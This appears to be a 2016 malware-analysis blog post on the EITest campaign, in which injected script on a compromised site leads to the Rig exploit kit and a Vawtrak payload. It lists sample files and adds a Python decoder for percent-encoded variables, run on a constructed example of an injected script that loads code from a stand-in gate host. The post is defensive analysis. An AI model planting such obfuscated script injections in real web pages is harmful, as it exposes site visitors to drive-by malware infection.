2016-09-12 - EITEST RIG EK FROM 185.117.73.160 SENDS VAWTRAK

ASSOCIATED FILES:

  • 2016-09-12-EITest-Rig-EK-sends-Vawtrak.pcap   (450,514 bytes)
  • 2016-09-12-EITest-Rig-EK-flash-exploit.swf   (49,157 bytes)
  • 2016-09-12-EITest-Rig-EK-landing-page.txt   (3,405 bytes)
  • 2016-09-12-EITest-Rig-EK-payload-Vawtrak.exe   (172,032 bytes)
  • 2016-09-12-EITest-flash-redirect-from-copyrightfrance.top.swf   (4,317 bytes)
  • 2016-09-12-page-from-teatrebarcelona.com-with-injected-EITest-script.txt   (133,343 bytes)


NOTES:


Shown above:  Tweet from @tmmalanalyst on Thursday 2016-09-08 showing some obfuscation in the injected EITest script.


Shown above:  Tweet from @FreeBSDfan on Monday 2016-09-12 (today) with Pastebin link to image showing further obfuscation of the injected EITest traffic.


BACKGROUND ON THE EITEST CAMPAIGN:



Shown above:  Flowchart for this infection traffic.


TRAFFIC


Shown above:  Traffic from the pcap filtered in Wireshark.


ASSOCIATED DOMAINS:


FILE HASHES

FLASH FILES:

PAYLOAD:


IMAGES


Shown above:  Injected EITest script in page from the compromised website.



Shown above:  Take the variable from the script (the part made up of % signs, each followed by two hex digits) and translate it.
Easy enough to do at www.asciitohex.com.
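The same translation step done offline, as an added example that is not part of the original post: it pulls every long run of %XX escapes out of a page, percent-decodes it, and lists any URLs that appear. The page content and the gate URL (gate.example.invalid) are constructed for the example, not taken from the pcap.

```python
import re
from urllib.parse import unquote

# Constructed sample page (not the real teatrebarcelona.com page from this post):
# the injected script keeps its payload as a run of %XX escapes so the gate URL
# is not visible in the raw HTML, then unescapes it when the page loads.
SAMPLE_PAGE = '''<html><body><p>Theatre schedule</p>
<script type="text/javascript">
var id = "%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%74%65%2E%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64%2F%78%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E";
document.write(unescape(id));
</script></body></html>'''

# A run of at least 8 consecutive %XX escapes (upper- or lower-case hex).
# Short runs are usually ordinary URL-encoding in a query string, not an
# obfuscated variable, so they are ignored.
PERCENT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")
URL = re.compile(r"https?://[^\s\"'<>]+")


def find_encoded_variables(html):
    """Return every long run of %XX escapes found in the page, decoded."""
    return [unquote(m.group(0)) for m in PERCENT_RUN.finditer(html)]


def extract_gate_urls(html):
    """Decode the obfuscated variables and list any URLs they reveal."""
    urls = []
    for decoded in find_encoded_variables(html):
        urls.extend(URL.findall(decoded))
    return urls


if __name__ == "__main__":
    for decoded in find_encoded_variables(SAMPLE_PAGE):
        print("decoded:", decoded)
    print("gate URLs:", extract_gate_urls(SAMPLE_PAGE))
```

Run it against the saved page-from-teatrebarcelona.com text file to get the same result as the manual translation shown in the image.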

 


Shown above:  EITest script translated from the variable.  EITest gate URLs highlighted in blue.



Shown above:  Alerts on this traffic in Security Onion using Suricata and the ET Pro ruleset.



Shown above:  Vawtrak artifacts and associated registry entry from the infected host.


FINAL NOTES

Once again, here are the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.
